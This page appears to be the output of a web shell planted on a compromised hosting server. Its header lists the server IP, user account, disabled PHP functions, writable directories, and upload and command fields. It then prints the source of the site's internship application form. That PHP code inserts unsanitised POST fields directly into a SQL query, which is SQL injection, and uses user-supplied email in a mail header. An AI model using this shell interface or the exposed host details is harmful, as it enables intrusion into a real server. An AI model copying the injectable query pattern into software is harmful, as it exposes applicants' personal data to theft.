403Webshell
Server IP : 108.170.25.35  /  Your IP : 3.22.181.81
Web Server : Apache/2
System : Linux gains.winzonesoftech.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : softechwinzone ( 1579)
PHP Version : 8.1.28
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/softechwinzone/domains/winzonesoftech.in/private_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/softechwinzone/domains/winzonesoftech.in/private_html/internapply.php
<?php include 'header.php'?>
<?php include 'navbar.php'?>

        <div id="content" class="site-content">
            <div class="page-header dtable text-center about-back">
                <div class="dcell">
                    <div class="container">
                        <h1 class="page-title">Internship</h1>
                        <ul id="breadcrumbs" class="breadcrumbs">
                            <li><a href="index.php">Home</a></li>
                            <li class="active">Internship</li>
                        </ul>
                    </div>
                </div>
            </div>
 
 
			<div class="p-tb110">
			 <!--<div class="container">
                    <div class="row">
                        <div class="col-md-12 col-xs-12">
                            <div class="ot-heading text-center">
                                <h6><span> For your dream career</span></h6>
                                
                                <p class="center">Please fill out the form below to your true details and wait for a reply. we’ll contact you as soon as possible.</p>
                            </div>
                        </div>
                    </div>
                </div>-->
			 <section class="bg-faq-bot particles-js form-pad" data-color="#fe4c1c,#00c3ff,#0160e7" data-id="a1">
			 
                <div class="container">
                    <div class="faq-form-wrap border-radius">
                        <div class="row">
						  <div class="col-md-12 col-xs-12">
                            <div class="ot-heading text-center">
                                <h6><span> For your dream career</span></h6>
                                  <h2 class="main-heading">Registration for Internship Training </h2>
                                <p class="center">Please fill out the form below to your true details and wait for a reply. we’ll contact you as soon as possible.</p>
                            </div>
                        </div>
                            <div class="col-md-8 col-xs-12">
                            
								
								<?php
								include'admin/connect.php';

								
 if(isset($_POST['submit']))
	 {
		 
		 
	$title=$_POST['title'];
	$fname=$_POST['fname'];
	$lname=$_POST['lname'];
	$dob=$_POST['dob'];
	$phone=$_POST['phone'];
	$email=$_POST['email'];
	$students=$_POST['students'];
	$message=$_POST['message'];
	$date = date('Y-m-d H:i:s');
			 
			 $to="winzoneadm@gmail.com";
	         $subject="WINZONE SOFTECH - Internship Application";
	         $header="from:$email";
	         $body="Hello Winzone Softech! Internship application  details:-\n\n Internship Role : $title\n\n  First name : $fname\n\n Last name : $lname\n\n date of birth : $dob\n\n phone number : $phone\n\n student category: $students\n\n message : $message\n\n";
	         $send=mail($to, $subject, $body, $header);
			 
			  $sql=mysqli_query($conn, "insert into internship (title,fname,lname,dob,phone,email,students,message,dateposted) values ('$title','$fname','$lname','$dob','$phone','$email','$students','$message','$date')");
        
				
			 if($sql)
 {
  echo "<Script>alert('Details Inserted Successfully')</script>";
 }
 else
 {
	 echo "<Script>alert('Insertion Failed')</script>";
 }
		 
	 }
							
							
							

?>


								
                                <form action="" method="post" enctype="multipart/form-data" class="wpcf7-form">
                                    <div class="faq-form row boxfnt">
									 <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-name">
                                               <select name="title" class="field-style form-select form-select-sm" aria-label=".form-select-sm example">
  <option selected>Select Internship Training</option>
  <option value="C & C++">C & C++</option>
  <option value="Web Design">Web Design</option>
  <option value="Web Development​">Web Development​</option>
  <option value="Full Stack Web Development​">Full Stack Web Development​</option>
  <option value="PHP Training">PHP Training</option>
  <option value="Network Engineering">Network Engineering</option>
  <option value="Python">Python</option>
  <option value="JAVA">JAVA</option>
  <option value="JavaScript">JavaScript</option>
 
</select>
                                            </span>
                                       </p>
                                        <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-name">
                                                <input type="text" name="fname" class="form-control" placeholder="Your First Name *" required="">
                                            </span>
                                       </p>
									   <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-name">
                                                <input type="text" name="lname" class="form-control" placeholder="Your Last Name *" required="">
                                            </span>
                                       </p>
									   <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-name">
											
                                                <input type="text" name="dob" class="form-control" placeholder="Date Of Birth"  >
                                            </span>
                                       </p>
									    <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-email">
                                                <input type="tel" name="phone" class="form-control" placeholder="Your phone number *" required="">
                                            </span>
                                           </p>
									  
									    <p class="col-md-6 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-email">
                                                <input type="email" name="email" class="form-control" placeholder="Your Email *" required="">
                                            </span>
                                           </p>
                                        <p class="col-md-12 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-name">
                                               <select name="students" class="field-style form-select form-select-sm" aria-label=".form-select-sm example">
  <option selected>Students Category</option>
  <option value="College Students">College Students</option>
  <option value="Staff">Faculty </option>
  <option value="Others">Others</option>
 
</select>
                                            </span>
                                       </p>
                                       
                                        <p class="col-md-12 col-xs-12">
                                            <span class="wpcf7-form-control-wrap your-message">
                                                <textarea name="message" cols="30" rows="3" class=""  placeholder="Why are you choose us..."  ></textarea>
                                            </span>
                                           </p>
										    
										   
									<!------------captcha------------>
								<script src="https://www.google.com/recaptcha/api.js" async defer></script>
									 <div
        class="g-recaptcha"
        data-sitekey="6LfXDwMcAAAAAGqKdFYp_p03MZW8-PZSgsKOt5Qd"
        data-callback="callback"
      ></div>
	  <!--------------------->
                                        
										<div><p class="col-md-12 col-xs-12 text-center">  
                                      										
                                            <button  type="submit"  id="submit" name="submit" class="octf-btn octf-btn-icon octf-btn-primary send-btn" disabled>Submit<i class="flaticon-right-arrow-1"></i></button>
		<script type="text/javascript">
      function callback() {
        const submitButton = document.getElementById("submit");
        submitButton.removeAttribute("disabled");
      }
    </script>
											
                                        </p>
										</div>
                                    </div>
                                </form>
                            </div>
							
							<div class="col-md-4 col-xs-12">
							 <div class="woocommerce">
                           <img src="img/find-job.png" alt="about winzone softech">
                         </div>
							</div>
							
							
							
							
							
                        </div>
                    </div>
                     
                </div>
            </section>
			</div>
 
		   
	
 <?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit